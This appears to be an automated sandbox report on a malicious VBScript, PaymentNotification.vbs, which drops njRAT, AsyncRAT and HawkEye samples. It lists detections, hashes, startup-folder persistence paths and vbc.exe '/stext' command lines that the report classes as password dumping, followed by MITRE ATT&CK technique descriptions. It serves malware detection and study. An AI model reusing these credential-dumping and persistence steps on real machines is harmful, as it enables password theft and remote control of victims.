Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: tmp87E4.tmp.exe PID: 5036 Parent PID: 1068

General

Start time:	20:50:20
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Imagebase:	0x6e0000
File size:	48640 bytes
MD5 hash:	6107D33B54A998C142311E55B3EC53D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: tmpFB21.tmp.exe PID: 4928 Parent PID: 1068

General

Start time:	20:50:48
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Imagebase:	0x8a0000
File size:	532992 bytes
MD5 hash:	5C0E9E0C72288F8B70BB68C0036ECB52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: vbc.exe PID: 1428 Parent PID: 4928

General

Start time:	20:50:58
Start date:	28/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: vbc.exe PID: 5824 Parent PID: 4928

General

Start time:	20:50:59
Start date:	28/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PaymentNotification.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: HawkEye

Threatname: AsyncRAT

Threatname: Njrat

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre